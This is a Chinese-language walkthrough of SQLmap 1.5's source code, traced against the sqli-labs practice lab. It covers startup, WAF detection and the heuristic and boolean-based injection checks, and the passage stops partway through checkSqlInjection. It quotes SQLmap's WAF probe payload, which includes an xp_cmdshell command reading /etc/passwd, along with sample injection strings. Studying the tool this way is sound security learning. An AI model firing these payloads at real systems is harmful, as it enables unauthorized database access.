SQLmap是一款优秀的开源渗透测试工具,亦是一项优秀的软件工程,想一次读懂SQLmap显然是非常难的,可能自己以后会写很多篇文章,直到读懂了代码为止吧。
环境
SQLmap 1.5.0
sqli-labs level 1
前置流程分析
先从最简单的参数开始吧,当我们尝试只提交-u时,打下断点,观察整个SQLmap的响应流程。
python .\sqlmap.py -u http://2b1dd5bd-c4a9-488b-8650-57cc233d78da.node4.buuoj.cn/Less-1/?id=2
入口函数
路由在sqlmap.py中,观察main中的执行流程,该try-catch逻辑中主要捕捉的错误时ctrl+c以及系统终端进程的异常退出,最后停止所有线程的执行。
其中,sys.exit()
调用后会引发SystemExit异常,可以捕获此异常做清理工作,用于在主线程中退出;os._exit()
直接将python解释器退出,余下的语句不会执行,用于在线程中退出。
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
except SystemExit:
raise
except:
traceback.print_exc()
finally:
# Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
if threading.activeCount() > 1:
os._exit(getattr(os, "_exitcode", 0))
else:
sys.exit(getattr(os, "_exitcode", 0))
else:
# cancelling postponed imports (because of Travis CI checks)
__import__("lib.controller.controller")
跟进main(),首先调用dirtyPathches()函数,主要是打一些适配补丁
对于httplib 接收长结果设置兼容
_http_client._MAXLINE = 1 * 1024 * 1024
在 sqlmap 分块的情况下防止双分块编码
if six.PY3:
if not hasattr(_http_client.HTTPConnection, "__send_output"):
_http_client.HTTPConnection.__send_output = _http_client.HTTPConnection._send_output
def _send_output(self, *args, **kwargs):
if conf.get("chunked") and "encode_chunked" in kwargs:
kwargs["encode_chunked"] = False
self.__send_output(*args, **kwargs)
_http_client.HTTPConnection._send_output = _send_output
在Windows系统上添加对inet_pton()
函数的支持。
if IS_WIN:
from thirdparty.wininetpton import win_inet_pton
接着进入resolveCrossReferences()
,这里负责解决交叉引用的地方(虽然不太理解,但是赋值就完事了)
def resolveCrossReferences():
"""
Place for cross-reference resolution
"""
lib.core.threads.isDigit = isDigit
lib.core.threads.readInput = readInput
lib.core.common.getPageTemplate = getPageTemplate
lib.core.convert.filterNone = filterNone
lib.core.convert.isListLike = isListLike
lib.core.convert.shellExec = shellExec
lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage
lib.core.option._pympTempLeakPatch = pympTempLeakPatch
lib.request.connect.setHTTPHandlers = _setHTTPHandlers
lib.utils.search.setHTTPHandlers = _setHTTPHandlers
lib.controller.checks.setVerbosity = setVerbosity
lib.utils.sqlalchemy.getSafeExString = getSafeExString
thirdparty.ansistrm.ansistrm.stdoutEncode = stdoutEncode
checkEnvironment()
负责检测环境,并将环境变量等将一些全局使用的变量加载到全局。这里检测了包括编码异常,版本等信息,最后如果sys.modules
字典导入了sqlmap.sqlmap
那么就对应的获取把data
异常都加载到全局,其中data
里面是各种多各个文件共享的一些变量。
def checkEnvironment():
try:
os.path.isdir(modulePath()
except UnicodeEncodeError:
errMsg = "your system does not properly handle non-ASCII paths. "
errMsg += "Please move the sqlmap's directory to the other location"
logger.critical(errMsg)
raise SystemExit
if distutils.version.LooseVersion(VERSION) < distutils.version.LooseVersion("1.0"):
errMsg = "your runtime environment (e.g. PYTHONPATH) is "
errMsg += "broken. Please make sure that you are not running "
errMsg += "newer versions of sqlmap with runtime scripts for older "
errMsg += "versions"
logger.critical(errMsg)
raise SystemExit
# Patch for pip (import) environment
if "sqlmap.sqlmap" in sys.modules:
for _ in ("cmdLineOptions", "conf", "kb"):
globals()[_] = getattr(sys.modules["lib.core.data"], _)
for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"):
globals()[_] = getattr(sys.modules["lib.core.exception"], _)
执行到setPaths(modulePath())
,其中传入的modulePat
h()是sqlmap脚本的绝对路径,在该函数中初始化paths变量,并且加载其他文件的相对路径为绝对路径,最后调用checkFile检查文件是否正常。
setPaths(modulePath())
最后banner()打印sqlmap的指纹信息。
def banner():
"""
This function prints sqlmap banner with its version
"""
if not any(_ in sys.argv for _ in ("--version", "--api")) and not conf.get("disableBanner"):
result = BANNER
if not IS_TTY or any(_ in sys.argv for _ in ("--disable-coloring", "--disable-colouring")):
result = clearColors(result)
elif IS_WIN:
coloramainit()
dataToStdout(result, forceOutput=True)
原始命令行数据获取
获取原始的命令行数据并存入字典,其中cmdLineOptions是自定义的字典类,继承自字典并封装,用于存储数据。其中命令行全部配置在/lib/parse/cmdline.py中,之后会对args进行初始化。
# Store original command line options for possible later restoration
args = cmdLineParser()
cmdLineOptions.update(args.__dict__ if hasattr(args, "__dict__") else args)
initOptions(cmdLineOptions)
接着进入initOptions()
进行初始化,调用三个函数,_setConfAttributes
初始化conf的参数,_setKnowledgeBaseAttributes()
将初始化的值赋值给knowledge base
,_mergeOptions()
将命令行选项与配置文件和默认选项合并。
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
_setConfAttributes()
_setKnowledgeBaseAttributes()
_mergeOptions(inputOptions, overrideOptions)
api判断
判断是否是api,如果是的话就会重新加载输出流和错误。
if conf.get("api"):
# heavy imports
from lib.utils.api import StdDbOut
from lib.utils.api import setRestAPILog
# Overwrite system standard output and standard error to write
# to an IPC database
sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")
sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
setRestAPILog()
init
init的过程比较复杂,具体看一个师傅(见参考)的解析吧。
def init():
"""
Set attributes into both configuration and knowledge base singletons
based upon command line and configuration file options.
"""
# 设置属性,基于命令行和配置文件选项。
_useWizardInterface() # 用户向导程序
setVerbosity() # 设置debug等级
_saveConfig() # 将命令行选项保存到sqlmap配置INI文件中
_setRequestFromFile() # 设置http请求从文件中
_cleanupOptions() # 清理配置选项
_cleanupEnvironment() # 清理环境
_dirtyPatches() # 补丁相关
_purgeOutput() # 安全删除(purges)输出目录。
_checkDependencies() # 检测丢失的依赖
_createTemporaryDirectory() # 创建运行的临时目录
_basicOptionValidation() # 检测选项是否有效
_setProxyList() # 设置代理列表
_setTorProxySettings() # 设置Tor代理
_setDNSServer() # 设置DNS服务器
_adjustLoggingFormatter() # 调整日志格式
_setMultipleTargets() # 如果在多个目标中运行,只定义一种参数
_setTamperingFunctions() # 设置tamper脚本
_setWafFunctions() # 载入waf检测脚本
_setTrafficOutputFP() # 设置记录http日志文件
_setupHTTPCollector() # 清理http收集
_resolveCrossReferences()
_checkWebSocket() # 检测websocket-client模块调用
parseTargetUrl() # 解析目标url
parseTargetDirect() # 解析目标DBMS
if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)):
# 如果设置了上述选项,配置相关http
_setHTTPTimeout() # 设置超时
_setHTTPExtraHeaders() # 设置Headers
_setHTTPCookies() # 设置Cookies
_setHTTPReferer() # 设置Referer
_setHTTPHost() # 设置Host
_setHTTPUserAgent() # 设置UserAgent
_setHTTPAuthentication() # 设置HTTPAuthentication
_setHTTPHandlers() # 检查并设置所有HTTP请求的HTTP / SOCKS代理。
_setDNSCache() # 设置DNS缓存
_setSocketPreConnect()
_setSafeVisit() # 检查并设置安全访问选项。
_doSearch() # 使用搜索平台搜索结果并存储
_setBulkMultipleTargets()
_setSitemapTargets() # 解析SitemapTargets中的目标
_checkTor() # 检测Tor
_setCrawler() # 设置爬虫
_findPageForms() # 寻找网页的表单
_setDBMS() # 强制DBMS选项
_setTechnique()
_setThreads() # 设置现场
_setOS() # 强制OS
_setWriteFile() # 写入文件
_setMetasploit() # Metasploit相关设置
_setDBMSAuthentication()
loadBoundaries() # 载入Boundaries
loadPayloads() # 载入Payloads
_setPrefixSuffix() # 设置前后缀
update() # 更新sqlmap
_loadQueries() # 加载查询的xml /查询
功能测试
对每个更新后的功能进行测试,包括覆盖测试、功能测试、fuzz测试等等,确保功能能正常使用,否则异常退出。之后初始化target变量后进行start()
if not conf.updateAll:
# Postponed imports (faster start)
if conf.smokeTest:
from lib.core.testing import smokeTest
os._exitcode = 1 - (smokeTest() or 0)
elif conf.vulnTest:
from lib.core.testing import vulnTest
os._exitcode = 1 - (vulnTest() or 0)
elif conf.bedTest:
from lib.core.testing import bedTest
os._exitcode = 1 - (bedTest() or 0)
elif conf.fuzzTest:
from lib.core.testing import fuzzTest
fuzzTest()
Start流程分析
我使用的是sqlmap1.5版本,start()
函数在lib/controller/controller.py
中,从269行开始,到765行结束,包含了后续所有SQL注入的测试内容,代码比较多,需要进行比较长的分析。
第一个if语句创建文件的hashFile,如果提交的命令行参数中有-d参数,调用函数initTargetEnv()、setupTargetEnv()、action(),最后返回True。
if conf.hashFile:
crackHashFile(conf.hashFile)
if conf.direct:
initTargetEnv()
setupTargetEnv()
action()
return True
initTargetEnv()
该函数会初始化目标环境,对参数进行赋空值或重置、设置用户指定的DBMS、对data中的参数进行urlencode编码(如果指定了urldecode则不编码)。
def initTargetEnv():
"""
Initialize target environment.
"""
if conf.multipleTargets:
if conf.hashDB:
conf.hashDB.close()
if conf.cj:
resetCookieJar(conf.cj)
conf.paramDict = {}
conf.parameters = {}
conf.hashDBFile = None
_setKnowledgeBaseAttributes(False)
_restoreMergedOptions()
_setDBMS()
if conf.data:
class _(six.text_type):
pass
kb.postUrlEncode = True
for key, value in conf.httpHeaders:
if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper():
kb.postUrlEncode = "urlencoded" in value
break
if kb.postUrlEncode:
original = conf.data
conf.data = _(urldecode(conf.data))
setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)
kb.postSpaceToPlus = '+' in original
match = re.search(INJECT_HERE_REGEX, "%s %s %s" % (conf.url, conf.data, conf.httpHeaders))
kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR
setupTargetEnv()
设置一些目标测试相关的环境文件等。
def setupTargetEnv():
_createTargetDirs() # 创建输出的目录
_setRequestParams()
# 检查请求参数,获取get参数 还有POST方式的附加--data的内容
# 检索注入标记符并给出提示询问是否对标记点检测注入
# 根据上面的注入标记法来操作
_setHashDB()
# session.sqlite 对这个会话存储的设置和检查
_resumeHashDBValues()
# 对session.sqlite基本历史信息的读入 数据库类型
_setResultsFile()
# 创建保存多目标模式输出结果的文件
_setAuthCred()
# 将当前目标的身份验证凭据(如果有)添加到密码管理器
_setAuxOptions()
# 设置辅助(主机相关)选项
action()
利用受影响URL参数上的SQL注入,并尽可能从后端数据库管理系统或操作系统提取请求的数据。
离开action()后往下。接着解析输入的参数,包括多个url
if conf.configFile and not kb.targets:
errMsg = "you did not edit the configuration file properly, set "
errMsg += "the target URL, list of targets or google dork"
logger.error(errMsg)
return False
if kb.targets and isListLike(kb.targets) and len(kb.targets) > 1:
infoMsg = "found a total of %d targets" % len(kb.targets)
logger.info(infoMsg)
接着初始化header,最后进入循环。
initialHeaders = list(conf.httpHeaders)
检查网络连接
if conf.checkInternet:
infoMsg = "checking for Internet connection"
logger.info(infoMsg)
if not checkInternet():
warnMsg = "[%s] [WARNING] no connection detected" % time.strftime("%X")
dataToStdout(warnMsg)
valid = False
for _ in xrange(conf.retries):
if checkInternet():
valid = True
break
else:
dataToStdout('.')
time.sleep(5)
if not valid:
errMsg = "please check your Internet connection and rerun"
raise SqlmapConnectionException(errMsg)
else:
dataToStdout("\n")
将测试目标的参数解析到conf中存储
conf.url = targetUrl
conf.method = targetMethod.upper().strip() if targetMethod else targetMethod
conf.data = targetData
conf.cookie = targetCookie
conf.httpHeaders = list(initialHeaders)
conf.httpHeaders.extend(targetHeaders or [])
conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])]
之后设置header,初始化target目标环境,parseTargetUrl()
解析url参数,进入正则匹配,判断参数是否测试过,如果没测试过,设置testSqlInj为True,并跳出循环。
testSqlInj = False
if PLACE.GET in conf.parameters and not any((conf.data, conf.testParameter)):
for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])
if paramKey not in kb.testedParams:
testSqlInj = True
break
else:
paramKey = (conf.hostname, conf.path, None, None)
if paramKey not in kb.testedParams:
testSqlInj = True
确认参数是否已经使用过注入,以及如果测试过就跳过。后面进行url其他参数判断
if testSqlInj and conf.hostname in kb.vulnHosts:
if kb.skipVulnHost is None:
message = "SQL injection vulnerability has already been detected "
message += "against '%s'. Do you want to skip " % conf.hostname
message += "further tests involving it? [Y/n]"
kb.skipVulnHost = readInput(message, default='Y', boolean=True)
testSqlInj = not kb.skipVulnHost
if not testSqlInj:
infoMsg = "skipping '%s'" % targetUrl
logger.info(infoMsg)
continue
进入checkWAF()
checkWAF()
sqlmap的checkWAF有一套完备的实现流程,实现check的payload:
IPS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#"
通过第三方data.json中的数据,正则匹配来识别每一个waf的种类
payload是一个随机数字与上面的WAF——IPS_WAF_CHECK_PAYLOAD。
payload = "%d %s" % (randomInt(), IPS_WAF_CHECK_PAYLOAD)
if PLACE.URI in conf.parameters:
place = PLACE.POST
value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
else:
place = PLACE.GET
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
对payload标识符进行替换生成随机字符串、数字等,返回相似度,以及是否匹配特征值。响应时间超过设置的阈值,则证明有waf
try:
retVal = (Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, raise404=False, disableTampering=True)[1] or 0) < IPS_WAF_CHECK_RATIO
except SqlmapConnectionException:
retVal = True
finally:
kb.matchRatio = None
接着,连续访问页面,测试请求的延时,如果延迟较小,则证明是稳定的。
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.technique:
# NOTE: this is not needed anymore, leaving only to display
# a warning message to the user in case the page is not stable
checkStability()
对测试列表进行排序
# Do a little prioritization reorder of a testable parameter list
parameters = list(conf.parameters.keys())
# Order of testing list (first to last)
orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET)
后面根据测试的level参数来设定需要测定哪些参数,检测参数是否被注入过,然后进行注入
heuristicCheckSqlInjection()
通过插入例如单双引号,通过观察返回页面的返回值异常、报错行为,来确定是否存在注入点。
def heuristicCheckSqlInjection(place, parameter):
origValue = conf.paramDict[place][parameter] # '1' ?id=1
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place # GET
# 前后缀 这里的前后缀类似下面的正式注入的边界前后缀
prefix = ""
suffix = ""
randStr = ""
if conf.prefix or conf.suffix: # 都是空 配置的
if conf.prefix:
prefix = conf.prefix
if conf.suffix:
suffix = conf.suffix
while randStr.count('\'') != 1 or randStr.count('\"') != 1: # randStr 生成的启发式payload 单引号的个数不等于或者双引号的个数不等于1
# 返回具有给定字符数的随机字符串值
# 长度10 HEURISTIC_CHECK_ALPHABET
# HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') 双引号 单引号 左右括号 逗号 点
# 随机生成长度为10 的 以上面的为选择的字符串
randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
# 例如这样 '),)\'.",(.)'
# 启发式模式
kb.heuristicMode = True
# 设置payload 是将前后缀与 随机字符串拼接
payload = "%s%s%s" % (prefix, randStr, suffix)
# 直接就是 randStr
payload = agent.payload(place, parameter, newValue=payload)
# 合成半payload 传入 请求类型 测试的参数 上面随机的value值
# u'id=__PAYLOAD_DELIMITER__1),)\'.",(.)__PAYLOAD_DELIMITER__'
# id=1 等于后插入payload分隔符 1后面再加上 随机字符串 然后再payload分隔符
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
# 这里只是 u'1(("()\'.(..' 最后编码为 '1%28%28%22%28%29%27.%28..'
kb.heuristicPage = page
kb.heuristicMode = False
parseFilePaths(page)
# 通过返回页面获取可能的路径 也是正则匹配
result = wasLastResponseDBMSError()
# 页面是不是有可识别的数据库报错的匹配 有的话返回True 正则匹配页面来获取
def _(page):
# 返回 正常页面没有异常字符串 但是启发式请求的返回有异常字符串
# 'java.lang.NumberFormatException', 'ValueError: invalid literal', 'TypeMismatchException', 'CF_SQL_INTEGER', ' for CFSQLTYPE ', 'cfqueryparam cfsqltype', 'InvalidParamTypeException',
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
casting = _(page) and not _(kb.originalPage) # 有就True 我们这里没有就 False
# 这里是启发式判断是否有 数据库报错获取数据库类型 代码的执行的错误
if not casting and not result and kb.dynamicParameter and origValue.isdigit():
# 上面的没有报错的话走这个
randInt = int(randomInt())
payload = "%s%s%s" % (prefix, "%d-%d" % (int(origValue) + randInt, randInt), suffix)
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
result = Request.queryPage(payload, place, raise404=False) # 比较页面是否相似
if not result:
# 再不成的话换成字符串再请求一次
randStr = randomStr()
payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
casting = Request.queryPage(payload, place, raise404=False)
kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE
# 根据上面是否匹配了一些异常 数据库报错异常 页面相似度来确认是否可能存在注入
elif result: # 这里就是从页面返回了数据库类型的报错 于是输出可能是注入的
infoMsg += "be injectable"
if Backend.getErrorParsedDBMSes():
infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes()
logger.info(infoMsg)
else:
infoMsg += "not be injectable"
logger.warn(infoMsg)
kb.heuristicMode = True # 设置启发式检测模式为 True
# xss检测 就是对 '<\'">' 在也没又显示匹配上了
randStr1, randStr2 = randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH), randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH)
# 获取两个6位的随机字符串
# ('xFyTsk', 'rHcreG')
value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)
# DUMMY_NON_SQLI_CHECK_APPENDIX = '<\'">' 这个就可以看出来就是xss检测了
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
# '\'xFyTsk<\'">rHcreG'
payload = agent.payload(place, parameter, newValue=payload)
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
# 存在的话就胡输出可能存在 xss
if value.lower() in (page or "").lower(): # 如果这个 value 还在返回的页面就可能存在xss
infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
infoMsg += "'%s' might be vulnerable to cross-site scripting (XSS) attacks" % parameter
logger.info(infoMsg)
# 还可能存在文件包含的一些特征
for match in re.finditer(FI_ERROR_REGEX, page or ""):
# FI_ERROR_REGEX '(?i)[^\\n]{0,100}(no such file|failed (to )?open)[^\\n]{0,100}'
# 可能存在文件包含
if randStr1.lower() in match.group(0).lower():
infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
infoMsg += "'%s' might be vulnerable to file inclusion (FI) attacks" % parameter
logger.info(infoMsg)
break
kb.heuristicMode = False
return kb.heuristicTest
checkSqlInjection()
正式注入检测,尝试测试多种注入方法,观察返回值的不同提取注入点信息等。
def checkSqlInjection(place, parameter, value):
#在这里存储有关边界和有效载荷的详细信息
# 这里继承了 AttribDict 就封装的字典用于存储一些注入成功的数据
injection = InjectionDict()
# 加载当前线程数据
threadData = getCurrentThreadData()
# 调整边界顺序
# 如果参数的value只是数字类型的 调整下排序顺序 数字的在前面如果是数字
if value.isdigit():
kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
boundaries = kb.cache.intBoundaries
elif value.isalpha():
kb.cache.alphaBoundaries = kb.cache.alphaBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: not any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
boundaries = kb.cache.alphaBoundaries
else:
boundaries = conf.boundaries
# 设置测试True
kb.testMode = True
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
tests = getSortedInjectionTests()
# 这里根据上面数据库报错的类型确实的数据库的优先级返测试列表 调整的是顺序
# 每一条如下
# {'risk': 1, 危险程度 比如数据库删除就比较高 参数的时候也可以配置
# 'title': 'AND boolean-based blind - WHERE or HAVING clause', 测试输出的标题
# 'clause': [1, 8, 9],
# 'level': 1, 级别
# 'request': {'payload': 'AND [RANDNUM]=[RANDNUM]'}, 请求的payload
# 'vector': 'AND [INFERENCE]',
# 'where': [1],
# 'response': {
# 'comparison': 'AND [RANDNUM]=[RANDNUM1]'
# },
# 'stype': 1}
seenPayload = set()
# 设置默认随机数字和随机字符串10位长度
kb.data.setdefault("randomInt", str(randomInt(10)))
kb.data.setdefault("randomStr", str(randomStr(10)))
while tests:
test = tests.pop(0)
try:
if kb.endDetection:
break
title = test.title # 'AND boolean-based blind - WHERE or HAVING clause'
kb.testType = stype = test.stype # 1
# 1: Boolean-based blind SQL injection
# 2: Error-based queries SQL injection
# 3: Inline queries SQL injection
# 4: Stacked queries SQL injection
# 5: Time-based blind SQL injection
# 6: UNION query SQL injection
clause = test.clause # [1, 8, 9]
#payload在哪个位置生效
# 0: Always
# 1: WHERE / HAVING
# 2: GROUP BY
# 3: ORDER BY
# 4: LIMIT
# 5: OFFSET
# 6: TOP
# 7: Table name
# 8: Column name
# 9: Pre-WHERE (non-query)
unionExtended = False
trueCode, falseCode = None, None
# 联合查询
if stype == PAYLOAD.TECHNIQUE.UNION: # 6 union联合查询 我们这条测试语句是1
configUnion(test.request.char)
if "[CHAR]" in title:
if conf.uChar is None:
continue
else:
title = title.replace("[CHAR]", conf.uChar)
elif "[RANDNUM]" in title or "(NULL)" in title:
title = title.replace("[RANDNUM]", "random number")
if test.request.columns == "[COLSTART]-[COLSTOP]":
if conf.uCols is None:
continue
else:
title = title.replace("[COLSTART]", str(conf.uColsStart))
title = title.replace("[COLSTOP]", str(conf.uColsStop))
elif conf.uCols is not None:
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "provided custom column range %s" % conf.uCols
logger.debug(debugMsg)
continue
match = re.search(r"(\d+)-(\d+)", test.request.columns)
if match and injection.data:
lower, upper = int(match.group(1)), int(match.group(2))
for _ in (lower, upper):
if _ > 1:
__ = 2 * (_ - 1) + 1 if _ == lower else 2 * _
unionExtended = True
test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns)
title = re.sub(r"\b%d\b" % _, str(__), title)
test.title = re.sub(r"\b%d\b" % _, str(__), test.title)
#如果用户只想测试特定的类型
if conf.tech and isinstance(conf.tech, list) and stype not in conf.tech:
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "specified to test only for "
debugMsg += "%s techniques" % " & ".join(PAYLOAD.SQLINJECTION[_] for _ in conf.tech)
logger.debug(debugMsg)
continue
#如果已经是相同的sql注入类型,则跳过测试
#由另一个测试确定
if injection.data and stype in injection.data:
debugMsg = "skipping test '%s' because " % title
debugMsg += "the payload for %s has " % PAYLOAD.SQLINJECTION[stype]
debugMsg += "already been identified"
logger.debug(debugMsg)
continue
#分析DBMS特定有效负载的详细信息
if "details" in test and "dbms" in test.details:
payloadDbms = test.details.dbms
else:
payloadDbms = None
# 这里省略了各种跳过一些测试的判断
if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
# 高过配置的危险级别不执行
if test.risk > conf.risk:
debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
debugMsg += "is higher than the provided (%d)" % conf.risk
logger.debug(debugMsg)
continue
# 还要对于 level 等级进行限制
if test.level > conf.level:
debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
debugMsg += "is higher than the provided (%d)" % conf.level
logger.debug(debugMsg)
continue
# 输出测试标题
infoMsg = "testing '%s'" % title
logger.info(infoMsg)
#根据当前测试dbms值强制后端dbms
#正确的有效载荷
# 根据启发式获取的数据库类型来配置到 Backend
Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)
# comment 是空 因为 test.request 是 {'payload': 'AND [RANDNUM]=[RANDNUM]'}
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)
# 这里面对标识符进行替换 这里是 RANDNUM 换为随机数字
# 最后获取 fstPayload 'AND 7282=7282'
# 这个边界 就是各种闭合的 ' and '1'='1 闭合单引号
for boundary in boundaries:
injectable = False
if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
continue
# 字段 要匹配上才可以 test的生效字段和 边界的
clauseMatch = False
for clauseTest in test.clause:
if clauseTest in boundary.clause:
clauseMatch = True
break
if test.clause != [0] and boundary.clause != [0] and not clauseMatch:
continue
whereMatch = False
for where in test.where:
if where in boundary.where:
whereMatch = True
break
if not whereMatch:
continue
# 对 payload进行去重 正则去掉 数字等变量
if fstPayload:
boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
# reqPayload= u'id=__PAYLOAD_DELIMITER__1) AND 7282=7282 AND (5049=5049__PAYLOAD_DELIMITER__'
# 这里对测试语句进行payload标识位置
if reqPayload:
stripPayload = re.sub(r"(\A|\b|_)([A-Za-z]{4}((?<!LIKE))|\d+)(_|\b|\Z)", r"\g<1>.\g<4>", reqPayload)
if stripPayload in seenPayload:
# stripPayload = u'id=__PAYLOAD_DELIMITER__.) AND .=. AND (.=.__PAYLOAD_DELIMITER__'
continue
else:
seenPayload.add(stripPayload)
else:
reqPayload = None
# 执行测试请求并检查
#分析测试的<response>
for method, check in test.response.items():
check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)
# 布尔盲注
if method == PAYLOAD.METHOD.COMPARISON:
# Generate payload used for comparison
def genCmpPayload():
sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)
# Forge response payload by prepending with
# boundary's prefix and appending the boundary's
# suffix to the test's ' <payload><comment> '
# string
boundPayload = agent.prefixQuery(sndPayload, prefix, where, clause)
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
cmpPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
return cmpPayload
# Useful to set kb.matchRatio at first based on
# the False response content
kb.matchRatio = None
kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE)
# 传入的 u'id=__PAYLOAD_DELIMITER__1) AND 9287=9488 AND (8325=8325__PAYLOAD_DELIMITER__'
Request.queryPage(genCmpPayload(), place, raise404=False)
falsePage, falseHeaders, falseCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode
falseRawResponse = "%s%s" % (falseHeaders, falsePage)
# Perform the test's True request
# true
trueResult = Request.queryPage(reqPayload, place, raise404=False)
truePage, trueHeaders, trueCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode
trueRawResponse = "%s%s" % (trueHeaders, truePage)
# 两次页面不一样的话继续走
if trueResult and not(truePage == falsePage and not kb.nullConnection):
# Perform the test's False request
falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
if not falseResult:
if kb.negativeLogic:
boundPayload = agent.prefixQuery(kb.data.randomStr, prefix, where, clause)
boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
errorPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
errorResult = Request.queryPage(errorPayload, place, raise404=False)
if errorResult:
continue
elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
_ = comparison(kb.heuristicPage, None, getRatioValue=True)
if _ > kb.matchRatio:
kb.matchRatio = _
logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)
# Reducing false-positive "appears" messages in heavily dynamic environment
if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False):
continue
injectable = True
elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
originalSet = set(getFilteredPageContent(kb.pageTemplate, True, "\n").split("\n"))
trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))
if threadData.lastErrorPage and threadData.lastErrorPage[1]:
